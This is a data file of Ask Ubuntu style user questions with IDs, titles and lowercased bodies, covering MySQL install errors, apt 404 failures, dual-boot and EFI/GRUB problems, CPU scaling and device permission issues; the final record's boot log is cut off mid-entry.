216145	dependency problems at installation from mysql-server-5.5	qcons @ 014-qcons : /var/lib $ sudo apt-get install -f mysql-server paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig mysql-server ist schon die neueste version . 0 aktualisiert , 0 neu installiert , 0 zu entfernen und 0 nicht aktualisiert . 2 nicht vollständig installiert oder entfernt . nach dieser operation werden 0 b plattenplatz zusätzlich benutzt . möchten sie fortfahren [ j/n ] ? j mysql-server-5.5 ( 5.5.28-0ubuntu0.12.04.2 ) wird eingerichtet ... 121112 11:16:52 [ note ] plugin 'federated ' is disabled . 121112 11:16:52 innodb : the innodb memory heap is disabled 121112 11:16:52 innodb : mutexes and rw_locks use gcc atomic builtins 121112 11:16:52 innodb : compressed tables use zlib 1.2.3.4 121112 11:16:52 innodb : initializing buffer pool , size = 128.0m 121112 11:16:52 innodb : completed initialization of buffer pool 121112 11:16:52 innodb : highest supported file format is barracuda . 121112 11:16:53 innodb : waiting for the background threads to start 121112 11:16:54 innodb : 1.1.8 started ; log sequence number 1595675 121112 11:16:54 innodb : starting shutdown ... 121112 11:16:54 innodb : shutdown completed ; log sequence number 1595675 start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : fehler beim bearbeiten von mysql-server-5.5 ( -- configure ) : unterprozess installiertes post-installation-skript gab den fehlerwert 1 zurück dpkg : abhängigkeitsprobleme verhindern konfiguration von mysql-server : mysql-server hängt ab von mysql-server-5.5 ; aber : paket mysql-server-5.5 ist noch nicht konfiguriert . dpkg : fehler beim bearbeiten von mysql-server ( -- configure ) : abhängigkeitsprobleme - verbleibt unkonfiguriert es wurde kein apport-bericht verfasst , da die fehlermeldung darauf hindeutet , dass dies lediglich ein folgefehler eines vorherigen problems ist . fehler traten auf beim bearbeiten von : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
216146	wifi keeps disconnecting while using a proxy	i just installed ubuntu 12.10 on my acer aspire one netbook and everything works excellent except for the wifi . when i click on a network i get connected but only for about one minute and then it says `` disconnected - you are offline '' . it tries to reconnect and after a while it says `` connection established '' . it 's a school network which uses no authentication but a proxy ( 172.16.4.1:8080 ) . can anyone help me ? i 'm new to ubuntu and do n't know a thing .
216147	is it possible to get gnome shell overview to show windows from all workspaces ?	by default , the overview in gnome shell only shows windows from the current workspace . is there some way to get it show the all open windows instead ? i 'm looking for functionality like that of the compiz scale 's spread feature , when used for windows from all workspaces .
216150	full wubi disk encryption	a soundcard problem occurred after moving some files in /home to the ecryptfs disk , sure i 'd made a like to /home , it does n't matter , but i still want to encrypt nearly all the ubuntu system not only the /home . friends suggest me opensuse or fedoral , but i love wubi . can i really do that ? the easier the better .
216156	how do i get drivers for a wd mybook essential to make it run on ubuntu ( 12.10 )	how do i get drivers for a wd mybook essential to make it run on ubuntu ( 12.10 ) the drive was running normal on winxp before , in ubuntu it is found but i can not work with the data on the drive ...
216159	how to make an easy complete full backup , including all configurations ?	i want to know how to backup entire applications and configurations of the system and applications , allowing me to exclude some directories . must be gui , bad at command-line ( can be a script for periodical automatic quick backups ) entire directories of my user 's files and configurations of system and of applications . allow exclusion of some directories , which i have backup manually myself automatic , of everyday ( customizable to which date , when exactly at which time , allow auto deletions or increment ) allow restore when i have done a fresh install . ( restoring all files and configurations , almost like the older version . fast backup to my external hard drive . if you need more information please answer .
216160	why does apt-get update fail with 404 errors ?	i have a problem with my newly installed 12.10 86_64 desktop . this error pops up on console when i try to update apt-get or try to install packages and nodejs just do n't work and there is no error on console . ignoring file 'eugenesan-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension this error started after my update on apt-get sudo apt-get update i 'm a newbie on ubuntu . this is the log file : ( in turkish 'yoksay ' = ignored , 'bağlandı ' = connected , 'getirilmesi başarısız oldu ' = failed to get ) attila @ lupuseum : ~ $ sudo apt-get update yoksay http : //security.ubuntu.com quantal-security inrelease yoksay http : //extras.ubuntu.com quantal inrelease yoksay http : //ppa.launchpad.net quantal inrelease bağlandı http : //security.ubuntu.com quantal-security release.gpg bağlandı http : //extras.ubuntu.com quantal release.gpg yoksay http : //cy.archive.ubuntu.com quantal inrelease yoksay http : //ppa.launchpad.net quantal inrelease bağlandı http : //security.ubuntu.com quantal-security release bağlandı http : //extras.ubuntu.com quantal release yoksay http : //cy.archive.ubuntu.com quantal-updates inrelease bağlandı http : //ppa.launchpad.net quantal release.gpg bağlandı http : //security.ubuntu.com quantal-security/main sources yoksay http : //cy.archive.ubuntu.com quantal-backports inrelease bağlandı http : //extras.ubuntu.com quantal/main sources yoksay http : //ppa.launchpad.net quantal release.gpg bağlandı http : //security.ubuntu.com quantal-security/restricted sources bağlandı http : //cy.archive.ubuntu.com quantal release.gpg bağlandı http : //extras.ubuntu.com quantal/main amd64 packages bağlandı http : //ppa.launchpad.net quantal release bağlandı http : //security.ubuntu.com quantal-security/universe sources bağlandı http : //cy.archive.ubuntu.com quantal-updates release.gpg bağlandı http : //extras.ubuntu.com quantal/main i386 packages yoksay http : //ppa.launchpad.net quantal release bağlandı http : //cy.archive.ubuntu.com quantal-backports release.gpg bağlandı http : //ppa.launchpad.net quantal/main sources bağlandı http : //security.ubuntu.com quantal-security/multiverse sources bağlandı http : //cy.archive.ubuntu.com quantal release bağlandı http : //ppa.launchpad.net quantal/main amd64 packages bağlandı http : //security.ubuntu.com quantal-security/main amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates release bağlandı http : //ppa.launchpad.net quantal/main i386 packages bağlandı http : //security.ubuntu.com quantal-security/restricted amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports release bağlandı http : //security.ubuntu.com quantal-security/universe amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal/main sources bağlandı http : //security.ubuntu.com quantal-security/multiverse amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal/restricted sources bağlandı http : //security.ubuntu.com quantal-security/main i386 packages bağlandı http : //cy.archive.ubuntu.com quantal/universe sources bağlandı http : //security.ubuntu.com quantal-security/restricted i386 packages bağlandı http : //cy.archive.ubuntu.com quantal/multiverse sources bağlandı http : //security.ubuntu.com quantal-security/universe i386 packages bağlandı http : //cy.archive.ubuntu.com quantal/main amd64 packages bağlandı http : //security.ubuntu.com quantal-security/multiverse i386 packages bağlandı http : //cy.archive.ubuntu.com quantal/restricted amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal/universe amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal/multiverse amd64 packages bağlandı http : //security.ubuntu.com quantal-security/main translation-en yoksay http : //extras.ubuntu.com quantal/main translation-tr_cy bağlandı http : //cy.archive.ubuntu.com quantal/main i386 packages bağlandı http : //cy.archive.ubuntu.com quantal/restricted i386 packages yoksay http : //extras.ubuntu.com quantal/main translation-tr bağlandı http : //security.ubuntu.com quantal-security/multiverse translation-en bağlandı http : //cy.archive.ubuntu.com quantal/universe i386 packages yoksay http : //extras.ubuntu.com quantal/main translation-en bağlandı http : //cy.archive.ubuntu.com quantal/multiverse i386 packages bağlandı http : //cy.archive.ubuntu.com quantal/main translation-tr bağlandı http : //cy.archive.ubuntu.com quantal/main translation-en bağlandı http : //security.ubuntu.com quantal-security/restricted translation-en bağlandı http : //cy.archive.ubuntu.com quantal/multiverse translation-tr bağlandı http : //cy.archive.ubuntu.com quantal/multiverse translation-en bağlandı http : //security.ubuntu.com quantal-security/universe translation-en bağlandı http : //cy.archive.ubuntu.com quantal/restricted translation-tr bağlandı http : //cy.archive.ubuntu.com quantal/restricted translation-en bağlandı http : //cy.archive.ubuntu.com quantal/universe translation-tr bağlandı http : //cy.archive.ubuntu.com quantal/universe translation-en bağlandı http : //cy.archive.ubuntu.com quantal-updates/main sources bağlandı http : //cy.archive.ubuntu.com quantal-updates/restricted sources bağlandı http : //cy.archive.ubuntu.com quantal-updates/universe sources bağlandı http : //cy.archive.ubuntu.com quantal-updates/multiverse sources bağlandı http : //cy.archive.ubuntu.com quantal-updates/main amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/restricted amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/universe amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/multiverse amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/main i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/restricted i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/universe i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-updates/multiverse i386 packages yoksay http : //ppa.launchpad.net quantal/main translation-tr_cy yoksay http : //ppa.launchpad.net quantal/main translation-tr yoksay http : //ppa.launchpad.net quantal/main translation-en bağlandı http : //cy.archive.ubuntu.com quantal-updates/main translation-en hata http : //ppa.launchpad.net quantal/main sources 404 not found hata http : //ppa.launchpad.net quantal/main amd64 packages 404 not found hata http : //ppa.launchpad.net quantal/main i386 packages 404 not found bağlandı http : //cy.archive.ubuntu.com quantal-updates/multiverse translation-en yoksay http : //ppa.launchpad.net quantal/main translation-tr_cy yoksay http : //security.ubuntu.com quantal-security/main translation-tr_cy yoksay http : //ppa.launchpad.net quantal/main translation-tr yoksay http : //security.ubuntu.com quantal-security/main translation-tr yoksay http : //ppa.launchpad.net quantal/main translation-en yoksay http : //security.ubuntu.com quantal-security/multiverse translation-tr_cy bağlandı http : //cy.archive.ubuntu.com quantal-updates/restricted translation-en yoksay http : //security.ubuntu.com quantal-security/multiverse translation-tr yoksay http : //security.ubuntu.com quantal-security/restricted translation-tr_cy yoksay http : //security.ubuntu.com quantal-security/restricted translation-tr bağlandı http : //cy.archive.ubuntu.com quantal-updates/universe translation-en yoksay http : //security.ubuntu.com quantal-security/universe translation-tr_cy bağlandı http : //cy.archive.ubuntu.com quantal-backports/main sources yoksay http : //security.ubuntu.com quantal-security/universe translation-tr bağlandı http : //cy.archive.ubuntu.com quantal-backports/restricted sources bağlandı http : //cy.archive.ubuntu.com quantal-backports/universe sources bağlandı http : //cy.archive.ubuntu.com quantal-backports/multiverse sources bağlandı http : //cy.archive.ubuntu.com quantal-backports/main amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/restricted amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/universe amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/multiverse amd64 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/main i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/restricted i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/universe i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/multiverse i386 packages bağlandı http : //cy.archive.ubuntu.com quantal-backports/main translation-en bağlandı http : //cy.archive.ubuntu.com quantal-backports/multiverse translation-en bağlandı http : //cy.archive.ubuntu.com quantal-backports/restricted translation-en bağlandı http : //cy.archive.ubuntu.com quantal-backports/universe translation-en yoksay http : //cy.archive.ubuntu.com quantal/main translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal/multiverse translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal/restricted translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal/universe translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-updates/main translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-updates/main translation-tr yoksay http : //cy.archive.ubuntu.com quantal-updates/multiverse translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-updates/multiverse translation-tr yoksay http : //cy.archive.ubuntu.com quantal-updates/restricted translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-updates/restricted translation-tr yoksay http : //cy.archive.ubuntu.com quantal-updates/universe translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-updates/universe translation-tr yoksay http : //cy.archive.ubuntu.com quantal-backports/main translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-backports/main translation-tr yoksay http : //cy.archive.ubuntu.com quantal-backports/multiverse translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-backports/multiverse translation-tr yoksay http : //cy.archive.ubuntu.com quantal-backports/restricted translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-backports/restricted translation-tr yoksay http : //cy.archive.ubuntu.com quantal-backports/universe translation-tr_cy yoksay http : //cy.archive.ubuntu.com quantal-backports/universe translation-tr n : ignoring file 'eugenesan-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension w : http : //ppa.launchpad.net/richarvey/nodejs/ubuntu/dists/quantal/main/source/sources 404 not found getirilmesi başarısız oldu w : http : //ppa.launchpad.net/richarvey/nodejs/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found getirilmesi başarısız oldu w : http : //ppa.launchpad.net/richarvey/nodejs/ubuntu/dists/quantal/main/binary-i386/packages 404 not found getirilmesi başarısız oldu e : some index files failed to download . they have been ignored , or old ones used instead .
216162	need help for installing ubuntu with windows 7	im going to install ubuntu 12.04.1 with my current operating system which is windows7 im going to use dual boot . i partitioned my ntfs drive and create new 25gb ntfs drive for ubuntu tell me is it alright or can i make more changes like for swap file or etc or just install ubuntu on my new created 25 gb ntfs drive and start using ubuntu please guide me because its my 1st time and i dont wana loose my windows operating system.and one onother thing i want to share with you recently i created a ubuntu live usb but it have some issues like slow startup slow shut down etc and i ca n't able to install third party softwares and ubuntu update every time i install it shows error so thats why i decided i 'm installing it ( ubuntu ) on pc with win7 and use it with dual boot .
216166	ca n't change remmina quality	i 'm using remmina on ubuntu 12.04 to connect to a windows xp computer . i 'm trying to change the connection quality on `` preferences-rdp-quality option '' from `` poor ( fastest ) '' to `` good '' . somehow , the change is neither saved nor applied , always changing back to `` poor '' . any ideas on how to make this change last ?
216172	dual display with matrox g550 card	i installed ubuntu 12.04 on my computer and i have a matrox g550 , but i have the problem my dual display is clone . how do i get dual display without being clone ? i tried to make one xorg.conf from x -configure and put that file in /usr/share/x11/xorg.conf.d/ and put in this file option xinerama on , but did n't work . thanks
216173	uninstall ubuntu 12.04 lts	how can i uninstall ubuntu 12.04 lts from my laptop and start again the installation from the scratch , i.e . by making the partition and soon staff . i made re-installation yesterday and ended up with a mess in the boot . the dual boot option is not available anymore . i made a boot repair and still could n't get out of this problem . if it helps to give some advise , please , have a look to the link below for the boot information http : //paste.ubuntu.com/1350363/ one more question : is it possible to delete some of the partitions that i have ? if so , please let me know so that i will install ubuntu only in my laptop in one partion . thank you
216175	how do i deploy multiple stacks in an environment ?	i 've deployed a haproxy- > lamp- > mysql stack using juju . it seemed pretty straight forward and it works well from my tests . i 've also seen its easy to scale a layer and add extra units to the lamp servers for example . the rest of our configuration on the server is done by puppet . however within the same environment `` ec2 '' ( specified in my environments.yaml ) in this case , i wish to deploy another set of servers using the same formular haproxy- > lamp- > mysql . however it doesnt seem possible as you get this error : error service name 'mysql ' is already in use is there a way to do this ? i had the idea to create separate environments in the yaml file with the same ec2 credentials but this seems like its going to spin up an extra juju config server per environment . as we are running over 250 web sites in these type of stacks that means an extra 250 servers on our aws bill which is far from ideal . ideally i 'm aiming to deploy multiple haproxy- > lamp- > mysql stacks without having to create new charms for each website . any suggestions welcome or if it ca n't be done i need to rethink things .
216176	how to make a ubuntu livecd ( on a usb )	i would like to make a livecd ( on a usb flash drive ) so i can run gparted and edit my partitions . how would i make the livecd ? since this is not windows , i ca n't use the normal one on ubuntu.com since it has wubi.exe which is the installer only for windows , any linux version or something ?
216181	cpu stuck in energy save mode	a few days ago , my computer started feeling very slow , and looking a cpu usage , i saw that even the simplest processes required a lot of cpu . as far as i can tell , it 's because the core are all down-clocked to 800mhz , and wo n't up-clock again when it 's needed . $ cat /proc/cpuinfo | grep mhz cpu mhz : 800.000 cpu mhz : 800.000 cpu mhz : 800.000 cpu mhz : 800.000 as a test , i then start up boinc , to load all my cores to the max , using htop , i see all cores running at > 95 % . my cpu scaling settings : $ for governor in $ ( ls /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor ) ; do cat $ governor ; done ondemand ondemand ondemand ondemand with 'ondemand , i expect the core to clock up , and go to full power , but a watch shows them steady on 800 . to get better performance , i need to manually force it : sudo bash -c 'for governor in $ ( ls /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor ) ; do echo '' performance '' > $ governor ; done' whch immediately changes the frequency to : $ cat /proc/cpuinfo | grep mhz cpu mhz : 2701.000 cpu mhz : 2701.000 cpu mhz : 2701.000 cpu mhz : 2701.000
216188	windows 7 and ubuntu 11.04 dual boot , grub menu not showing !	i 've installed ubuntu 11.04 alongside with windows 7 . everything is fine until i want to enter windows 7 . when i start my pc , after normal boot , there is no grub or os selection menu , and my system loads straight into ubuntu . any help would be very appreciated ! thanks !
216190	integrate unity webapps in gnome-shell	is there anyway to integrate the new ubuntu webapps integration with gnome-shell ( i 'm not using unity ) i can accept the integration in firefox , but nothing happend in gnome-shell . if this is not possible , how can i globaly disable firefox to ask me for webapps integration ?
216192	find hidden url for streaming radio	i would like to find a utility that can find the hidden url to eg this streaming radio so i can use that in mocp ( music on console player ) . urlsnooper is there for windows , but i ca n't find an alternative for linux .
216204	redshift does n't work with lubuntu	i have a problem running a program called redshift . when i open it it closes immediately . here is the error when i try to run it from the terminal : $ redshift ( process:3525 ) : glib-gobject-critical ** : g_type_instance_get_private : assertion `instance ! = null & & instance- > g_class ! = null ' failed segmentation fault ( core dumped )
216205	error while saving screenshot with any screenshot software	i am using ubuntu 12.04 . when i try to take a screenshot with the default screenshot utility or shutter a dialog box appears saying that /home/user/pictures is a read-only file system . i checked the permission of the folder but it was set to the default value : creating and deleting files . what might have gone wrong here ? how can i solve this ? this i did n't have this problem before , not even yesterday . and as far as i remember , i did n't install any software that might have changed the permissions .
216215	invalid efi file path	i 've just installed ubuntu 12 on my new laptop ( with win7 64bit pre installed ) in efi mode and now i ca n't load win7 anymore ( ubuntu just loads fine from grub ) . when i select the windows 7 entry in the grub menu , i get this error : invalid efi file path the grub.cfg entry ( generated by boot-repair ) is : menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' -- class windows -- class os { insmod part_gpt insmod ntfs set root= ' ( hd0 , gpt3 ) ' search -- no-floppy -- fs-uuid -- set=root b8449665449625e2 chainloader +1 } this is the parted output : gnu parted 2.3 viene usato /dev/sda benvenuti in gnu parted . digitare `` help '' per l'elenco dei comandi . ( parted ) print list modello : ata st9500325as ( scsi ) disco /dev/sda : 500gb dimensione del settore ( logica/fisica ) : 512b/512b tabella delle partizioni : gpt numero inizio fine dimensione file system nome flag 5 1049kb 106mb 105mb fat32 avvio 3 345mb 200gb 200gb ntfs basic data partition 1 200gb 200gb 1049kb bios_grub 2 200gb 496gb 296gb ext4 4 496gb 500gb 4172mb the boot efi partition , mounted as /dev/sda5 on /boot/efi type vfat ( rw ) ) has the following files ( excluding the grub folder and other files on the boot root ) : ./efi ./efi/efi ./efi/efi/boot ./efi/efi/boot/bootx64.efi ./efi/efi/ubuntu ./efi/efi/ubuntu/grubx64.efi ./efi/efi/microsoft ./efi/efi/microsoft/boot ./efi/efi/microsoft/boot/bootmgfw.efi.grb ./efi/efi/microsoft/boot/bootmgfw.efi ./efi/efi/microsoft/boot/bootx64.efi.grb ./efi/efi/microsoft/boot/bootx64.efi how can i fix this ? thanks
216216	gfx-drivers for hp probook 4300s	i recently installed ubuntu 12.10 on my hp probook 4330s laptop and everything seems to run fine , besides the graphic card drivers . when i go into settings - > details - > graphics it says driver : unknown . i checked hp driver site , and it only had gfx-drivers for suse distros . how can i get the proper drivers for this machine ? no , i have n't . does it only find out what kind of card i have , or does it actually download the proper driver for me ? thank you though , i 'm dowloading it now .
216223	softwares and lib files	i have been using suse until now . i am trying to learn ubuntu and i need to install some packages and library files but i could not find some ( maybe due to they are named different from suse ) . for example typing apt-cache compat gives no results and also glibc , cross and needed 32-bit libraries . is there any way to see packages and library lists on ubuntu like opensuse ?
216230	remote desktop to ubuntu has wrong keyboard mapping	i am connecting to a new install of ubuntu 12.04 via remote desktop ( after installing xrdp ) . everything seems to work fine except that the keyboard mapping is for us rather than uk . i have looked at the keyboard layout settings and it shows 'us ' being available but no other languages . if i try to add another layout there seems none available . logging in on the machine itself shows english ( uk ) as the locale and if i try to add a new language it shows them all being available . i have tried both ubuntu-2d and gnome-classic . can anyone shed some light on this ?
216233	why does my update manager always `` fail to download package files '' ?	i am using ubuntu 11.04 . update manager does not finish update since 'applying changes ' does not finish and says : failed to download package files . check your internet connection . how do i resolve this ?
216237	calibre can not send book to kindle	i do n't know why but calibre stopped sending working with my kindle on ubuntu 12.04 32 bits . till a few time ago everything was working just fine , but now whenever i connect my kindle and try to send some book on the main meory of the device i get this error : calibre , version 0.8.38 error : error : error communicating with device [ errno 30 ] read-only file system : '/media/kindle/documents/blisett , luther' traceback ( most recent call last ) : file `` /usr/lib/calibre/calibre/gui2/device.py '' , line 81 , in run self.result = self.func ( *self.args , **self.kwargs ) file `` /usr/lib/calibre/calibre/gui2/device.py '' , line 411 , in _upload_books metadata=metadata , end_session=false ) file `` /usr/lib/calibre/calibre/devices/usbms/driver.py '' , line 260 , in upload_books filepath = self.normalize_path ( self.create_upload_path ( path , mdata , fname ) ) file `` /usr/lib/calibre/calibre/devices/usbms/device.py '' , line 1120 , in create_upload_path os.makedirs ( filedir ) file `` /usr/lib/python2.7/os.py '' , line 157 , in makedirs mkdir ( name , mode ) oserror : [ errno 30 ] read-only file system : '/media/kindle/documents/blisett , luther' i realize it is something that has to do with the permissions , so i have tried to change them using chown : sudo chmod a+rwx /media/kindle but i get this error : chmod : changing permissions of 'kindle ' : read-only file system how can i fix this ?
216242	how do i disable the prompt on suspend ?	when ever i go to suspend i get a prompt do you want to suspend to ram ? suspending computer in 30 seconds . i do want that prompt , it 's new to xubuntu 12.10 . how can i disable it ?
216245	ubuntu missing dual boot	i have a dual boot with windows 7 and ubuntu 12.04 . now ubuntu is missing after windows checked /tmp for errors . windows boots fine , but ubuntu boots to a grub prompt . i looked in the \ubuntu\disks\ folder and the root.disk was at 0 kb . can i access my data throught windows ? next , i ran a live usb and boot-repair and still only getting a grub prompt . i am attaching bootinfoscript output . how do i restore my normal ubuntu and restore files and folders ? can i recover the personal files and folders using liveusb ? boot info script 0.61.full + boot-repair extra info ============================= boot info summary : =============================== = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sda . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : __________________________________________________ ________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________ ________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe /wubildr /ubuntu/winboot/wubildr /wubildr.mbr /ubuntu/winboot/wubildr.mbr /ubuntu/disks/swap.disk sda2/wubi : __________________________________________________ ___________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________ ________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________ ________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 2048 . operating system : boot files : /wubildr sda4 : __________________________________________________ ________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda4 has 30722047 sectors , but according to the info from fdisk , it has 30943919 sectors . operating system : boot files : /bootmgr /boot/bcd sdb1 : __________________________________________________ ________________________ file system : vfat boot sector type : syslinux 4.04 2011-04-18 boot sector info : syslinux looks at sector 2998472 of /dev/sdb1 for its second stage . syslinux is installed in the directory . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /syslinux/syslinux.cfg /efi/boot/bootx64.efi /ldlinux.sys ============================ drive/partition info : ============================= drive : sda __________________________________________________ ___________________ disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 411,647 409,600 7 ntfs / exfat / hpfs /dev/sda2 411,648 533,389,311 532,977,664 7 ntfs / exfat / hpfs /dev/sda3 533,389,312 594,198,527 60,809,216 f w95 extended ( lba ) /dev/sda5 533,391,360 594,198,527 60,807,168 7 ntfs / exfat / hpfs /dev/sda4 594,198,528 625,142,447 30,943,920 12 compaq diagnostics drive : sdb __________________________________________________ ___________________ disk /dev/sdb : 2013 mb , 2013265920 bytes 16 heads , 15 sectors/track , 16384 cylinders , total 3932160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 3,608 3,932,159 3,928,552 6 fat16 '' blkid '' output : __________________________________________________ ______________ device uuid type label /dev/loop0 squashfs /dev/sda1 c0c646d2c646c87c ntfs /dev/sda2 f65048ab50487501 ntfs /dev/sda4 da6052146051f829 ntfs lenovo_part /dev/sda5 dc72893972891982 ntfs lenovo /dev/sdb1 3f00-e6d7 vfat ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sda1 /media/c0c646d2c646c87c fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , b lksize=4096 ) /dev/sda5 /media/lenovo fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , b lksize=4096 ) /dev/sdb1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=cp437 , i ocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =========================== sdb1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ========================= sdb1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdb1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? boot/grub/grub.cfg 1 ================= sdb1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/chain.c32 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdb1 : version of com32 ( r ) files used by syslinux : =============== syslinux/chain.c32 : com32r module ( v4.xx ) syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda2/wubi ========= devices which do n't seem to have a corresponding hard drive : ========= sdc additional information : =================== log of boot-repair 2012-11-11__14h20 =================== boot-repair version : 3.194~ppa53~precise boot-sav version : 3.194~ppa53~precise glade2script version : 3.2.2~ppa45~precise boot-sav-extra version : 3.194~ppa53~precise boot-repair is executed in live-session ( ubuntu 12.04.1 lts , precise , ubuntu , x86_64 ) cpu op-mode ( s ) : 32-bit , 64-bit boot_image=/casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- =================== os-prober : /dev/sda1 : windows 7 ( loader ) : windows : chain /dev/sda4 : windows recovery environment ( loader ) : windows1 : chain =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' c0c646d2c646c87c '' type= '' ntfs '' /dev/sda2 : uuid= '' f65048ab50487501 '' type= '' ntfs '' /dev/sda4 : label= '' lenovo_part '' uuid= '' da6052146051f829 '' type= '' ntfs '' /dev/sda5 : label= '' lenovo '' uuid= '' dc72893972891982 '' type= '' ntfs '' /dev/sdb1 : sec_type= '' msdos '' uuid= '' 3f00-e6d7 '' type= '' vfat '' 1 disks with os , 2 os : 0 linux , 0 macos , 2 windows , 0 unknown type os . windows not detected by os-prober on sda2 . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . there is wubi inside sda2 =================== uefi/legacy mode : bios is efi-compatible , and is setup in efi-mode for this live-session . =================== partitions & disks : sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /media/c0c646d2c646c87c . sda2 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , 